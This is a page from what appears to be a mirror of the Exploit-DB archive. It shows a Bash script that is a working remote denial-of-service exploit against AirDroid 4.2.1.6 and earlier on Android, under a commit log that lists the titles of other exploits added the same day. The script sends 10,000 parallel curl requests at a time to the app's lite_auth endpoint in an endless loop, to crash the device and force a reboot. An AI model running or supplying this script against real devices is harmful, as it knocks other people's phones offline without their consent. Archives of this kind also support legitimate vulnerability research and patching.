bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/android/dos/46337.sh
Offensive Security a4b18dada5 DB: 2019-02-14 
11 changes to exploits/shellcodes

AirDroid 4.2.1.6 - Denial of Service

NetworkSleuth 3.0 - 'Name' Denial of Service (PoC)
runc< 1.0-rc6 (Docker < 18.09.2) - Host Command Execution
Ubuntu snapd < 2.37.1 - Local Privilege Escalation
runc < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)

Netatalk < 3.1.12 - Authentication Bypass
Netatalk 3.1.12 - Authentication Bypass
Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting
Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure)
Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure)
Rukovoditel Project Management CRM 2.4.1 - Cross-Site Scripting
PilusCart 1.4.1 - 'send' SQL Injection
2019-02-14 05:01:54 +00:00

42 lines
No EOL
1.4 KiB
Bash
Executable file
Raw Blame History

#!/bin/bash
# *********************************************************************
# * Author: Marcelo Vázquez (aka s4vitar) *
# * AirDroid Denial of Service (DoS) & System Crash + Forced Reboot *
# *********************************************************************
# Exploit Title: AirDroid Remote Denial of Service (DoS) & System Crash + Forced Reboot
# Date: 2019-02-13
# Exploit Author: Marcelo Vázquez (aka s4vitar)
# Collaborators: Victor Lasa (aka vowkin)
# Vendor Homepage: https://web.airdroid.com/
# Software Link: https://play.google.com/store/apps/details?id=com.sand.airdroid&hl=en
# Version: <= AirDroid 4.2.1.6
# Tested on: Android
url=$1 # Example: http://192.168.1.46:8888
requests=0
trap ctrl_c INT
# If Ctrl+C key is pressed then the threads are killed
function ctrl_c() {
echo -e "\n\n[*]Exiting...\n" && tput cnorm
pkill curl > /dev/null 2>&1
exit
}
# Detect number of arguments being passed to the program
if [ "$(echo $#)" == "1" ]; then
# Infinite Loop
tput cnorm && while true; do
# We send 10000 requests in thread
for i in $(seq 1 10000); do
curl --silent "$url/sdctl/comm/lite_auth/" &
let requests+=1
done && wait # Here we wait for the threads to finish
echo "Requests Sent: $requests"
done
else
echo -e "\nUsage: ./AirDroid_request.sh http://ip:port\n"
fi
Reference in a new issue View git blame Copy permalink